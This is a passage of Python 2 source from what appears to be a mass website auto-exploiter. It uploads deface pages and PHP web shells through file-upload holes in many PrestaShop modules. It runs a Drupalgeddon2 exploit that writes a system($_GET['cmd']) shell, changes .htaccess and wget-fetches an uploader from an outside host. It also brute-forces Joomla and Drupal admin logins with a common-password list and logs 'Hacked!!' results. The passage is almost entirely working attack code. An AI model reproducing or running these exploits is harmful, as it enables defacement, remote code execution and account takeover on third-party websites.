2380. self.Print_vuln_Shell(ShellPath)
2381. with open('result/Shell_results.txt', 'a') as writer:
2382. writer.write(ShellPath + '\n')
2383. else:
2384. self.Print_NotVuln('1attributewizardpro', site)
2385. else:
2386. self.Print_NotVuln('1attributewizardpro', site)
2387. except:
2388. self.Print_NotVuln('1attributewizardpro', site)
2389.  
2390. def attributewizardpro3(self, site):
2391. try:
2392. Exp = site + '/modules/attributewizardpro.OLD/file_upload.php'
2393. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2394. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2395. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2396. if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
2397. Index = GoT.text.encode('utf-8').split('|||')[0]
2398. print Index
2399. IndexPath = site + '/modules/attributewizardpro.OLD/file_uploads/' + Index
2400. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
2401. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2402. self.Print_Vuln_index(IndexPath)
2403. with open('result/Index_results.txt', 'a') as writer:
2404. writer.write(IndexPath + '\n')
2405. Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2406. if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
2407. Shell = Got2.text.encode('utf-8').split('|||')[0]
2408. ShellPath = site + '/modules/attributewizardpro.OLD/file_uploads/' + Shell
2409. CheckShell = requests.get('http://' + ShellPath, timeout=5)
2410. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2411. self.Print_vuln_Shell(ShellPath)
2412. with open('result/Shell_results.txt', 'a') as writer:
2413. writer.write(ShellPath + '\n')
2414. else:
2415. self.Print_NotVuln('attributewizardpro.OLD', site)
2416. else:
2417. self.Print_NotVuln('attributewizardpro.OLD', site)
2418. except:
2419. self.Print_NotVuln('attributewizardpro.OLD', site)
2420.  
2421. def attributewizardpro_x(self, site):
2422. try:
2423. Exp = site + '/modules/attributewizardpro_x/file_upload.php'
2424. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2425. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2426. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2427. if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
2428. Index = GoT.text.encode('utf-8').split('|||')[0]
2429. print Index
2430. IndexPath = site + '/modules/attributewizardpro_x/file_uploads/' + Index
2431. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
2432. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2433. self.Print_Vuln_index(IndexPath)
2434. with open('result/Index_results.txt', 'a') as writer:
2435. writer.write(IndexPath + '\n')
2436. Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2437. if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
2438. Shell = Got2.text.encode('utf-8').split('|||')[0]
2439. ShellPath = site + '/modules/attributewizardpro_x/file_uploads/' + Shell
2440. CheckShell = requests.get('http://' + ShellPath, timeout=5)
2441. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2442. self.Print_vuln_Shell(ShellPath)
2443. with open('result/Shell_results.txt', 'a') as writer:
2444. writer.write(ShellPath + '\n')
2445. else:
2446. self.Print_NotVuln('attributewizardpro_x', site)
2447. else:
2448. self.Print_NotVuln('attributewizardpro_x', site)
2449. except:
2450. self.Print_NotVuln('attributewizardpro_x', site)
2451.  
2452. def advancedslider(self, site):
2453. try:
2454. Exp = site + '/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php'
2455. Checkvuln = requests.get('http://' + Exp, timeout=5)
2456. FileDataIndex = {'qqfile': open(self.Jce_Deface_image, 'rb')}
2457. if Checkvuln.status_code == 200:
2458. requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2459. IndexPath = site + '/modules/advancedslider/uploads/' + self.Jce_Deface_image.split('/')[1]
2460. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
2461. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2462. self.Print_Vuln_index(IndexPath)
2463. with open('result/Index_results.txt', 'a') as writer:
2464. writer.write(IndexPath + '\n')
2465. else:
2466. self.Print_NotVuln('advancedslider', site)
2467. else:
2468. self.Print_NotVuln('advancedslider', site)
2469. except:
2470. self.Print_NotVuln('advancedslider', site)
2471.  
2472. def cartabandonmentpro(self, site):
2473. try:
2474. Exp = site + '/modules/cartabandonmentpro/upload.php'
2475. Checkvuln = requests.get('http://' + Exp, timeout=5)
2476. FileDataIndex = {'image': open(self.Jce_Deface_image, 'rb')}
2477. if Checkvuln.status_code == 200:
2478. requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2479. IndexPath = site + '/modules/cartabandonmentpro/uploads/' + self.Jce_Deface_image.split('/')[1]
2480. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
2481. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2482. self.Print_Vuln_index(IndexPath)
2483. with open('result/Index_results.txt', 'a') as writer:
2484. writer.write(IndexPath + '\n')
2485. else:
2486. self.Print_NotVuln('cartabandonmentpro', site)
2487. else:
2488. self.Print_NotVuln('cartabandonmentpro', site)
2489. except:
2490. self.Print_NotVuln('cartabandonmentpro', site)
2491.  
2492. def cartabandonmentproOld(self, site):
2493. try:
2494. Exp = site + '/modules/cartabandonmentproOld/upload.php'
2495. Checkvuln = requests.get('http://' + Exp, timeout=5)
2496. FileDataIndex = {'image': open(self.Jce_Deface_image, 'rb')}
2497. if Checkvuln.status_code == 200:
2498. requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2499. IndexPath = site + '/modules/cartabandonmentproOld/uploads/' + self.Jce_Deface_image.split('/')[1]
2500. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
2501. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2502. self.Print_Vuln_index(IndexPath)
2503. with open('result/Index_results.txt', 'a') as writer:
2504. writer.write(IndexPath + '\n')
2505. else:
2506. self.Print_NotVuln('cartabandonmentproOld', site)
2507. else:
2508. self.Print_NotVuln('cartabandonmentproOld', site)
2509. except:
2510. self.Print_NotVuln('cartabandonmentproOld', site)
2511.  
2512. def videostab(self, site):
2513. try:
2514. Exp = site + '/modules/videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload'
2515. Checkvuln = requests.get('http://' + Exp, timeout=5)
2516. FileDataIndex = {'qqfile': open(self.Jce_Deface_image, 'rb')}
2517. if Checkvuln.status_code == 200:
2518. requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2519. IndexPath = site + '/modules/videostab/uploads/' + self.Jce_Deface_image.split('/')[1]
2520. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
2521. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2522. self.Print_Vuln_index(IndexPath)
2523. with open('result/Index_results.txt', 'a') as writer:
2524. writer.write(IndexPath + '\n')
2525. else:
2526. self.Print_NotVuln('videostab', site)
2527. else:
2528. self.Print_NotVuln('videostab', site)
2529. except:
2530. self.Print_NotVuln('videostab', site)
2531.  
2532. def wg24themeadministration(self, site):
2533. Exl = site + '/modules/wg24themeadministration/wg24_ajax.php'
2534. try:
2535. Checkvuln = requests.get('http://' + Exl, timeout=5)
2536. if Checkvuln.status_code == 200:
2537. PostData = {'data': 'bajatax',
2538. 'type': 'pattern_upload'}
2539. FileDataIndex = {'bajatax': open(self.Jce_Deface_image, 'rb')}
2540. FileDataShell = {'bajatax': open(self.ShellPresta, 'rb')}
2541. uploadedPathIndex = site + '/modules/wg24themeadministration/img/upload/' + self.Jce_Deface_image.split('/')[1]
2542. uploadedPathShell = site + '/modules/wg24themeadministration/img/upload/' + self.ShellPresta.split('/')[1]
2543. requests.post('http://' + Exl, files=FileDataIndex, data=PostData, timeout=5)
2544. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
2545. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2546. self.Print_Vuln_index(uploadedPathIndex)
2547. with open('result/Index_results.txt', 'a') as writer:
2548. writer.write(uploadedPathIndex + '\n')
2549. requests.post('http://' + Exl, files=FileDataShell, data=PostData, timeout=5)
2550. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
2551. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
2552. self.Print_vuln_Shell(uploadedPathShell)
2553. with open('result/Shell_results.txt', 'a') as writer:
2554. writer.write(uploadedPathShell + '\n')
2555. else:
2556. self.Print_NotVuln('wg24themeadministration', site)
2557. else:
2558. self.Print_NotVuln('wg24themeadministration', site)
2559. except:
2560. self.Print_NotVuln('wg24themeadministration', site)
2561.  
2562.  
2563. def fieldvmegamenu(self, site):
2564. Exl = site + '/modules/fieldvmegamenu/ajax/upload.php'
2565. try:
2566. Checkvuln = requests.get('http://' + Exl, timeout=5)
2567. if Checkvuln.status_code == 200:
2568. FileDataIndex = {'images[]': open(self.Jce_Deface_image, 'rb')}
2569. FileDataShell = {'images[]': open(self.ShellPresta, 'rb')}
2570. uploadedPathIndex = site + '/modules/fieldvmegamenu/uploads/' + self.Jce_Deface_image.split('/')[1]
2571. uploadedPathShell = site + '/modules/fieldvmegamenu/uploads/' + self.ShellPresta.split('/')[1]
2572. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
2573. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
2574. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2575. self.Print_Vuln_index(uploadedPathIndex)
2576. with open('result/Index_results.txt', 'a') as writer:
2577. writer.write(uploadedPathIndex + '\n')
2578. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
2579. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
2580. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
2581. self.Print_vuln_Shell(uploadedPathShell)
2582. with open('result/Shell_results.txt', 'a') as writer:
2583. writer.write(uploadedPathShell + '\n')
2584. else:
2585. self.Print_NotVuln('fieldvmegamenu', site)
2586. else:
2587. self.Print_NotVuln('fieldvmegamenu', site)
2588. except:
2589. self.Print_NotVuln('fieldvmegamenu', site)
2590.  
2591. def wdoptionpanel(self, site):
2592. Exl = site + '/modules/wdoptionpanel/wdoptionpanel_ajax.php'
2593. try:
2594. Checkvuln = requests.get('http://' + Exl, timeout=5)
2595. if Checkvuln.status_code == 200:
2596. PostData = {'data': 'bajatax',
2597. 'type': 'image_upload'}
2598. FileDataIndex = {'bajatax': open(self.Jce_Deface_image, 'rb')}
2599. FileDataShell = {'bajatax': open(self.ShellPresta, 'rb')}
2600. uploadedPathIndex = site + '/modules/wdoptionpanel/upload/' + self.Jce_Deface_image.split('/')[1]
2601. uploadedPathShell = site + '/modules/wdoptionpanel/upload/' + self.ShellPresta.split('/')[1]
2602. requests.post('http://' + Exl, files=FileDataIndex, data=PostData, timeout=5)
2603. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
2604. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2605. self.Print_Vuln_index(uploadedPathIndex)
2606. with open('result/Index_results.txt', 'a') as writer:
2607. writer.write(uploadedPathIndex + '\n')
2608. requests.post('http://' + Exl, files=FileDataShell, data=PostData, timeout=5)
2609. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
2610. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
2611. self.Print_vuln_Shell(uploadedPathShell)
2612. with open('result/Shell_results.txt', 'a') as writer:
2613. writer.write(uploadedPathShell + '\n')
2614. else:
2615. self.Print_NotVuln('wdoptionpanel', site)
2616. else:
2617. self.Print_NotVuln('wdoptionpanel', site)
2618. except:
2619. self.Print_NotVuln('wdoptionpanel', site)
2620.  
2621.  
2622. def pk_flexmenu(self, site):
2623. Exl = site + '/modules/pk_flexmenu/ajax/upload.php'
2624. try:
2625. Checkvuln = requests.get('http://' + Exl, timeout=5)
2626. if Checkvuln.status_code == 200:
2627. FileDataIndex = {'images[]': open(self.Jce_Deface_image, 'rb')}
2628. FileDataShell = {'images[]': open(self.ShellPresta, 'rb')}
2629. uploadedPathIndex = site + '/modules/pk_flexmenu/uploads/' + self.Jce_Deface_image.split('/')[1]
2630. uploadedPathShell = site + '/modules/pk_flexmenu/uploads/' + self.ShellPresta.split('/')[1]
2631. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
2632. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
2633. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2634. self.Print_Vuln_index(uploadedPathIndex)
2635. with open('result/Index_results.txt', 'a') as writer:
2636. writer.write(uploadedPathIndex + '\n')
2637. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
2638. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
2639. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
2640. self.Print_vuln_Shell(uploadedPathShell)
2641. with open('result/Shell_results.txt', 'a') as writer:
2642. writer.write(uploadedPathShell + '\n')
2643. else:
2644. self.Print_NotVuln('pk_flexmenu', site)
2645. else:
2646. self.Print_NotVuln('pk_flexmenu', site)
2647. except:
2648. self.Print_NotVuln('pk_flexmenu', site)
2649.  
2650.  
2651. def nvn_export_orders(self, site):
2652. Exl = site + '/modules/nvn_export_orders/upload.php'
2653. try:
2654. Checkvuln = requests.get('http://' + Exl, timeout=5)
2655. if Checkvuln.status_code == 200:
2656. FileDataIndex = {'images[]': open(self.Jce_Deface_image, 'rb')}
2657. FileDataShell = {'images[]': open(self.ShellPresta, 'rb')}
2658. uploadedPathIndex = site + '/modules/nvn_export_orders/' + self.Jce_Deface_image.split('/')[1]
2659. uploadedPathShell = site + '/modules/nvn_export_orders/' + self.ShellPresta.split('/')[1]
2660. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
2661. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
2662. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2663. self.Print_Vuln_index(uploadedPathIndex)
2664. with open('result/Index_results.txt', 'a') as writer:
2665. writer.write(uploadedPathIndex + '\n')
2666. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
2667. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
2668. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
2669. self.Print_vuln_Shell(uploadedPathShell)
2670. with open('result/Shell_results.txt', 'a') as writer:
2671. writer.write(uploadedPathShell + '\n')
2672. else:
2673. self.Print_NotVuln('nvn_export_orders', site)
2674. else:
2675. self.Print_NotVuln('nvn_export_orders', site)
2676. except:
2677. self.Print_NotVuln('nvn_export_orders', site)
2678.  
2679. def megamenu(self, site):
2680. try:
2681. Exp = site + '/modules/megamenu/uploadify/uploadify.php?id=pwn'
2682. Checkvuln = requests.get('http://' + Exp, timeout=5)
2683. FileDataIndex = {'Filedata': open(self.Jce_Deface_image, 'rb')}
2684. if Checkvuln.status_code == 200:
2685. requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2686. IndexPath = site + '/' + self.Jce_Deface_image.split('/')[1]
2687. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
2688. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2689. self.Print_Vuln_index(IndexPath)
2690. with open('result/Index_results.txt', 'a') as writer:
2691. writer.write(IndexPath + '\n')
2692. else:
2693. self.Print_NotVuln('megamenu', site)
2694. else:
2695. self.Print_NotVuln('megamenu', site)
2696. except:
2697. self.Print_NotVuln('megamenu', site)
2698.  
2699.  
2700.  
2701. def tdpsthemeoptionpanel(self, site):
2702. Exl = site + '/modules/tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php'
2703. try:
2704. Checkvuln = requests.get('http://' + Exl, timeout=5)
2705. if Checkvuln.status_code == 200:
2706. FileDataIndex = {'image_upload': open(self.Jce_Deface_image, 'rb')}
2707. FileDataShell = {'image_upload': open(self.ShellPresta, 'rb')}
2708. uploadedPathIndex = site + '/modules/tdpsthemeoptionpanel/upload/' + self.Jce_Deface_image.split('/')[1]
2709. uploadedPathShell = site + '/modules/tdpsthemeoptionpanel/upload/' + self.ShellPresta.split('/')[1]
2710. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
2711. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
2712. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2713. self.Print_Vuln_index(uploadedPathIndex)
2714. with open('result/Index_results.txt', 'a') as writer:
2715. writer.write(uploadedPathIndex + '\n')
2716. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
2717. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
2718. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
2719. self.Print_vuln_Shell(uploadedPathShell)
2720. with open('result/Shell_results.txt', 'a') as writer:
2721. writer.write(uploadedPathShell + '\n')
2722. else:
2723. self.Print_NotVuln('tdpsthemeoptionpanel', site)
2724. else:
2725. self.Print_NotVuln('tdpsthemeoptionpanel', site)
2726. except:
2727. self.Print_NotVuln('tdpsthemeoptionpanel', site)
2728.  
2729. def psmodthemeoptionpanel(self, site):
2730. Exl = site + '/modules/psmodthemeoptionpanel/psmodthemeoptionpanel_ajax.php'
2731. try:
2732. Checkvuln = requests.get('http://' + Exl, timeout=5)
2733. if Checkvuln.status_code == 200:
2734. FileDataIndex = {'image_upload': open(self.Jce_Deface_image, 'rb')}
2735. FileDataShell = {'image_upload': open(self.ShellPresta, 'rb')}
2736. uploadedPathIndex = site + '/modules/psmodthemeoptionpanel/upload/' + self.Jce_Deface_image.split('/')[1]
2737. uploadedPathShell = site + '/modules/psmodthemeoptionpanel/upload/' + self.ShellPresta.split('/')[1]
2738. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
2739. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
2740. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2741. self.Print_Vuln_index(uploadedPathIndex)
2742. with open('result/Index_results.txt', 'a') as writer:
2743. writer.write(uploadedPathIndex + '\n')
2744. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
2745. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
2746. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
2747. self.Print_vuln_Shell(uploadedPathShell)
2748. with open('result/Shell_results.txt', 'a') as writer:
2749. writer.write(uploadedPathShell + '\n')
2750. else:
2751. self.Print_NotVuln('psmodthemeoptionpanel', site)
2752. else:
2753. self.Print_NotVuln('psmodthemeoptionpanel', site)
2754. except:
2755. self.Print_NotVuln('psmodthemeoptionpanel', site)
2756.  
2757.  
2758. def lib(self, site):
2759. Exl = site + '/modules/lib/redactor/file_upload.php'
2760. try:
2761. Checkvuln = requests.get('http://' + Exl, timeout=5)
2762. if Checkvuln.status_code == 200:
2763. FileDataIndex = {'file': open(self.Jce_Deface_image, 'rb')}
2764. FileDataShell = {'file': open(self.ShellPresta, 'rb')}
2765. uploadedPathIndex = site + '/masseditproduct/uploads/file/' + self.Jce_Deface_image.split('/')[1]
2766. uploadedPathShell = site + '/masseditproduct/uploads/file/' + self.ShellPresta.split('/')[1]
2767. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
2768. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
2769. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2770. self.Print_Vuln_index(uploadedPathIndex)
2771. with open('result/Index_results.txt', 'a') as writer:
2772. writer.write(uploadedPathIndex + '\n')
2773. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
2774. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
2775. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
2776. self.Print_vuln_Shell(uploadedPathShell)
2777. with open('result/Shell_results.txt', 'a') as writer:
2778. writer.write(uploadedPathShell + '\n')
2779. else:
2780. self.Print_NotVuln('lib', site)
2781. else:
2782. self.Print_NotVuln('lib', site)
2783. except:
2784. self.Print_NotVuln('lib', site)
2785.  
2786. class DrupalGedden2(object):
2787. def __init__(self, site):
2788. self.r = '\033[31m'
2789. self.g = '\033[32m'
2790. self.y = '\033[33m'
2791. self.b = '\033[34m'
2792. self.m = '\033[35m'
2793. self.c = '\033[36m'
2794. self.w = '\033[37m'
2795. self.rr = '\033[39m'
2796. try:
2797. CheckVersion = requests.get('http://' + site, timeout=5)
2798. if 'content="Drupal 7' in CheckVersion.text.encode('utf-8'):
2799. self.Version7Drupal(site)
2800. elif 'content="Drupal 8' in CheckVersion.text.encode('utf-8'):
2801. self.Version8Drupal(site)
2802. else:
2803. self.Version7Drupal(site)
2804. except:
2805. self.Print_NotVuln('Drupalgeddon2', site)
2806.  
2807. def Print_NotVuln(self, NameVuln, site):
2808. print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' + self.y + NameVuln + self.c + ' [Not Vuln]'
2809.  
2810. def Print_Vuln_index(self, indexPath):
2811. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + indexPath + self.g + ' [Index Uploaded!]'
2812.  
2813. def Print_vuln_Shell(self, shellPath):
2814. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + shellPath + self.g + ' [Shell Uploaded!]'
2815.  
2816. def Version7Drupal(self, site):
2817. try:
2818. payloadshell = "Vuln!!<?php system($_GET['cmd']); ?>"
2819. PrivatePAyLoad = "echo 'Vuln!! patch it Now!' > vuln.htm;" \
2820. " echo '" + payloadshell + "'> sites/default/files/vuln.php;" \
2821. " echo '" + payloadshell + "'> vuln.php;" \
2822. " cd sites/default/files/;" \
2823. " echo 'AddType application/x-httpd-php .jpg' > .htaccess;" \
2824. " wget 'https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php'"
2825. get_params = {'q': 'user/password', 'name[#post_render][]': 'passthru',
2826. 'name[#markup]': PrivatePAyLoad, 'name[#type]': 'markup'}
2827. post_params = {'form_id': 'user_pass', '_triggering_element_name': 'name'}
2828.  
2829. r = requests.post('http://' + site, data=post_params, params=get_params)
2830. m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
2831. if m:
2832. found = m.group(1)
2833. get_params = {'q': 'file/ajax/name/#value/' + found}
2834. post_params = {'form_build_id': found}
2835. requests.post('http://' + site, data=post_params, params=get_params)
2836. a = requests.get('http://' + site + '/sites/default/files/vuln.php', timeout=5)
2837. if 'Vuln!!' in a.text.encode('utf-8'):
2838. self.Print_vuln_Shell(site + '/sites/default/files/vuln.php?cmd=id')
2839. with open('result/Shell_results.txt', 'a') as writer:
2840. writer.write(site + '/sites/default/files/vuln.php?cmd=id' + '\n')
2841. gg = requests.get('http://' + site + '/vuln.htm', timeout=5)
2842. CheckUploader = requests.get('http://' + site + '/sites/default/files/up.php', timeout=5)
2843. if 'Vuln!!' in CheckUploader.text.encode('utf-8'):
2844. self.Print_vuln_Shell(site + '/sites/default/files/up.php')
2845. with open('result/Shell_results.txt', 'a') as writer:
2846. writer.write(site + '/sites/default/files/up.php' + '\n')
2847. if 'Vuln!!' in gg.text.encode('utf-8'):
2848. self.Print_Vuln_index(site + '/vuln.htm')
2849. with open('result/Index_results.txt', 'a') as writer:
2850. writer.write(site + '/vuln.htm' + '\n')
2851. else:
2852. gg = requests.get('http://' + site + '/vuln.htm', timeout=5)
2853. if 'Vuln!!' in gg.text.encode('utf-8'):
2854. self.Print_Vuln_index(site + '/vuln.htm')
2855. with open('result/Index_results.txt', 'a') as writer:
2856. writer.write(site + '/vuln.htm' + '\n')
2857. Checkshell = requests.get('http://' + site + '/vuln.php', timeout=5)
2858. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
2859. self.Print_vuln_Shell(site + '/vuln.php?cmd=id')
2860. with open('result/Shell_results.txt', 'a') as writer:
2861. writer.write(site + '/vuln.php?cmd=id' + '\n')
2862. else:
2863. self.Print_NotVuln('Drupalgeddon2', site)
2864. else:
2865. self.Print_NotVuln('Drupalgeddon2', site)
2866. except:
2867. self.Print_NotVuln('Drupalgeddon2 Timeout!', site)
2868.  
2869. def Version8Drupal(self, site):
2870. try:
2871. Exp = site + '/user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
2872. payloadshell = "<?php system($_GET['cmd']); ?>"
2873.  
2874. payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
2875. 'mail[#type]': 'markup', 'mail[#markup]': 'echo Vuln!! patch it Now!> vuln.htm'}
2876.  
2877. payload2 = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
2878. 'mail[#type]': 'markup', 'mail[#markup]': 'echo "' + payloadshell + '"> vuln.php'}
2879. r = requests.post('http://' + Exp, data=payload, timeout=5)
2880. if r.status_code == 200:
2881. a = requests.get('http://' + site + '/vuln.htm', timeout=5)
2882. if 'Vuln!!' in a.text.encode('utf-8'):
2883. requests.post('http://' + Exp, data=payload2, timeout=5)
2884. CheckShell = requests.get('http://' + site + '/vuln.php', timeout=5)
2885. if CheckShell.status_code == 200:
2886. self.Print_vuln_Shell(site + '/vuln.php?cmd=id')
2887. with open('result/Shell_results.txt', 'a') as writer:
2888. writer.write(site + '/vuln.php?cmd=id' + '\n')
2889. self.Print_Vuln_index(site + '/vuln.htm')
2890. with open('result/Index_results.txt', 'a') as writer:
2891. writer.write(site + '/vuln.htm' + '\n')
2892. else:
2893. self.Print_Vuln_index(site + '/vuln.htm')
2894. with open('result/Index_results.txt', 'a') as writer:
2895. writer.write(site + '/vuln.htm' + '\n')
2896. else:
2897. self.Print_NotVuln('Drupalgeddon2', site)
2898. else:
2899. self.Print_NotVuln('Drupalgeddon2', site)
2900. except:
2901. self.Print_NotVuln('Drupalgeddon2 Timeout!', site)
2902.  
2903.  
2904.  
2905. class JooMLaBruteForce(object):
2906. def __init__(self, site):
2907. self.flag = 0
2908. self.r = '\033[31m'
2909. self.g = '\033[32m'
2910. self.y = '\033[33m'
2911. self.b = '\033[34m'
2912. self.m = '\033[35m'
2913. self.c = '\033[36m'
2914. self.w = '\033[37m'
2915. self.rr = '\033[39m'
2916. self.password = ["admin", "demo", "admin123", "123456", "123456789", "123", "1234", "12345", "1234567", "12345678",
2917. "123456789", "admin1234", "admin123456", "pass123", "root", "321321", "123123", "112233", "102030",
2918. "password", "pass", "qwerty", "abc123", "654321", "pass1234", "abc1234", "demo1", "demo2",
2919. "demodemo", "site", "shop", "password123", "admin1", "admin12", "adminqwe", "test", "test123", "1",
2920. "12", "123123"]
2921. thread = []
2922. for passwd in self.password:
2923. t = threading.Thread(target=self.Joomla, args=(site, passwd))
2924. t.start()
2925. thread.append(t)
2926. time.sleep(0.02)
2927. for j in thread:
2928. j.join()
2929. if self.flag == 0:
2930. print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
2931. + self.y + 'Joomla BruteForce' + self.c + ' [Not Vuln]'
2932.  
2933. def Joomla(self, site, passwd):
2934. try:
2935. sess = requests.session()
2936. GetToken = sess.get('http://' + site + '/administrator/index.php', timeout=5)
2937. try:
2938. ToKeN = re.findall('type="hidden" name="(.*)" value="1"',
2939. GetToken.text.encode('utf-8'))[0]
2940. GeTOPtIoN = re.findall('type="hidden" name="option" value="(.*)"', GetToken.text.encode('utf-8'))[0]
2941. except:
2942. ToKeN = ''
2943. GeTOPtIoN = 'com_login'
2944. agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
2945. post = {}
2946. post['username'] = "admin"
2947. post['passwd'] = passwd
2948. post['lang'] = 'en-GB'
2949. post['option'] = GeTOPtIoN
2950. post['task'] = 'login'
2951. post[ToKeN] = '1'
2952. url = "http://" + site + "/administrator/index.php"
2953. GoT = sess.post(url, data=post, headers=agent, timeout=10)
2954. if 'logout' in GoT.text.encode('utf-8'):
2955. print self.c + ' [' + self.y + '+' + self.c + '] ' +\
2956. self.r + site + ' ' + self.y + 'Joomla' + self.g + ' [Hacked!!]'
2957. with open('result/Joomla_Hacked.txt', 'a') as writer:
2958. writer.write('http://' + site + '/administrator/index.php' + '\n Username: admin' +
2959. '\n Password: ' + passwd + '\n-----------------------------------------\n')
2960. self.flag = 1
2961. os._exit(1)
2962. except Exception, e:
2963. pass
2964.  
2965. class DrupalBruteForce(object):
2966. def __init__(self, site):
2967. self.flag = 0
2968. self.r = '\033[31m'
2969. self.g = '\033[32m'
2970. self.y = '\033[33m'
2971. self.b = '\033[34m'
2972. self.m = '\033[35m'
2973. self.c = '\033[36m'
2974. self.w = '\033[37m'
2975. self.rr = '\033[39m'
2976. self.password = ["admin", "demo", "admin123", "123456", "123456789", "123", "1234", "12345", "1234567", "12345678",
2977. "123456789", "admin1234", "admin123456", "pass123", "root", "321321", "123123", "112233", "102030",
2978. "password", "pass", "qwerty", "abc123", "654321", "pass1234", "abc1234", "demo1", "demo2",
2979. "demodemo", "site", "shop", "password123", "admin1", "admin12", "adminqwe", "test", "test123", "1",
2980. "12", "123123"]
2981. thread = []
2982. for passwd in self.password:
2983. t = threading.Thread(target=self.Drupal, args=(site, passwd))
2984. t.start()
2985. thread.append(t)
2986. time.sleep(0.02)
2987. for j in thread:
2988. j.join()
2989. if self.flag == 0:
2990. print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
2991. + self.y + 'Drupal BruteForce' + self.c + ' [Not Vuln]'
2992.  
2993. def Drupal(self, site, passwd):
2994. try:
2995. sess = requests.session()
2996. GetToken = sess.get('http://' + site + '/?q=user/login', timeout=5)
2997. try:
2998. GetOP = re.findall('id="edit-submit" name="op" value="(.*)"',
2999. GetToken.text.encode('utf-8'))[0].split('"')[0]
3000. except:
3001. GetOP = 'Log in'
